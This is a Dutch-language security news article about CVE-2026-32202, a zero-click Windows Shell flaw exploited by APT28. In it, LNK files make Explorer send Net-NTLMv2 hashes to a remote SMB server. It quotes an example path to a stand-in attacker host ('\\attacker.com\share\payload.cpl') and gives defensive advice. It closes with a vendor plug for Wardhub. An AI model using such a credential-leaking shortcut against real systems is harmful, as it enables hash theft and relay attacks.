Wat is er gebeurd? - Opnieuw een Windows Shell-kwetsbaarheid na een ontoereikende patch
Microsoft ziet zich opnieuw geconfronteerd met een kritiek beveiligingslek in de Windows Shell. Nadat de cyberbende APT28, bekend als Fancy Bear, kwetsbaarheid CVE-2026-21510 al in het wild had misbruikt, bleek Microsofts februaripatch ontoereikend. De gebrekkige softwarereparatie liet een nieuw beveiligingslek CVE-2026-32202 achter, dat nu eveneens actief wordt aangevallen.
Microsoft heeft de nieuwe kwetsbaarheid ingedeeld met een CVSS-score van 4.3 (risico "gemiddeld") en op de april-patchday hersteld. In de loop van maandag actualiseerden de ontwikkelaars echter de kwetsbaarheidsvermelding met een verontrustend bericht: het spoofinglek in de Windows Shell wordt inmiddels door kwaadwillende actoren in het wild misbruikt.
De details - Zero-click-exploit maakt automatische NTLM-authenticatie mogelijk
Terwijl Microsoft de gevolgen van de nieuwe kwetsbaarheid als minder ernstig inschat dan het oorspronkelijke lek, schetst een analyse van Akamai een zorgwekkender beeld. De IT-beveiligingsexperts classificeren CVE-2026-32202 als zero-click-kwetsbaarheid - in tegenstelling tot Microsofts inschatting dat slachtoffers een kwaadaardig bestand moeten uitvoeren.
Het probleem ligt in een over het hoofd gezien codepad: de Windows Verkenner probeert bij het weergeven van mappen automatisch uit LNK-bestanden pictogrammen voor de doelbestanden te extraheren. Daarbij vindt een padcontrole plaats die een verbinding met externe SMB-servers tot stand kan brengen - zonder verdere gebruikersinteractie.
Het aanvalsmechanisme in detail
De aanval werkt als volgt: een LNK-bestand bevat een snelkoppeling naar een externe server, bijvoorbeeld "\\attacker.com\share\payload.cpl". Zodra het slachtoffer de betreffende map opent, bouwt de computer automatisch een verbinding met de SMB-server op en start een NTLM-authenticatie. Daarbij wordt de Net-NTLMv2-hash van de computer van het slachtoffer naar de aanvallers verzonden.
Deze hashwaarden kunnen vervolgens worden misbruikt voor NTLM-relay-aanvallen en offline cracking, wat de aanvallers verregaande mogelijkheden voor vervolgaanvallen biedt.
Duiding - Waarom deze kwetsbaarheid bijzonder gevaarlijk is
Het gevaar van deze kwetsbaarheid schuilt in haar schijnbare onschuld. Terwijl het oorspronkelijke lek CVE-2026-21510 de uitvoering van schadelijke code vanaf het netwerk mogelijk maakte, lijkt de nieuwe kwetsbaarheid op het eerste gezicht minder bedreigend. Microsoft beschrijft haar als spoofinglek met een gemiddeld risico.
In werkelijkheid biedt zij aanvallers echter zero-click-toegang tot gevoelige authenticatiegegevens. In bedrijfsomgevingen, waar beveiligingssystemen zoals toegangscontrole en camerabewaking vaak via het netwerk worden beheerd, kunnen gecompromitteerde NTLM-hashes de toegang tot kritieke beveiligingsinfrastructuur mogelijk maken.
Het feit dat APT28/Fancy Bear - een door een staat gesteunde hackersgroep - beide kwetsbaarheden al benut, onderstreept het strategische belang van deze aanvalsvectoren voor professionele cybercriminelen.
Praktijktips - Directe maatregelen voor IT-verantwoordelijken
IT-beheerders zouden onmiddellijk de volgende maatregelen moeten nemen:
- Onmiddellijke patchinstallatie: De aprilupdate van Microsoft moet direct op alle Windows-systemen worden geïnstalleerd
- Netwerkmonitoring: Bewaking van SMB-verbindingen naar externe servers, in het bijzonder onverwachte authenticatiepogingen
- E-mailbeveiliging: Strengere filtering van e-mailbijlagen, in het bijzonder LNK-bestanden
- NTLM-hardening: Controle en aanscherping van de NTLM-configuratie in Active Directory
Bijzondere aandacht zouden beheerders van kritieke infrastructuur zoals beveiligingssystemen moeten betrachten. Inwerpkluizen, offerblokken en moderne toegangscontrolesystemen zijn vaak netwerkgebaseerd en zouden via gecompromitteerde beheerdersaccounts aanvalbaar kunnen worden.
Vooruitblik - Lessons learned en toekomstige ontwikkelingen
De zaak toont exemplarisch de uitdagingen bij het patchen van complexe softwaresystemen. Een onvolledige patch kan nieuwe aanvalsvectoren creëren die door ervaren aanvallers snel worden geïdentificeerd en benut.
Voor de beveiligingsbranche betekent dit een versterking van de trend naar zero-trust-architecturen. Traditionele perimetergebaseerde beveiligingsconcepten stuiten op hun grenzen wanneer aanvallers al over legitieme authenticatiegegevens beschikken.
Microsoft heeft aangekondigd de authenticatie in Active Directory grondig te herzien. Dit zou op middellange termijn kunnen leiden tot een afscheid van de verouderde NTLM-concepten, die al jaren als veiligheidsrisico gelden.
Ondernemingen zouden deze ontwikkelingen moeten aangrijpen om hun volledige beveiligingsstrategie te heroverwegen. Moderne oplossingen zoals Wardhub voor het centrale beheer van beveiligingssystemen kunnen daarbij helpen om ook bij een gecompromitteerde netwerkinfrastructuur kritieke zones te beschermen.
De dreigingssituatie zal verder verscherpen, aangezien door staten gesteunde groepen zoals APT28 voortdurend nieuwe aanvalsvectoren ontwikkelen. Proactieve beveiligingsmaatregelen en tijdige patchcycli worden daarmee een bedrijfskritische noodzaak.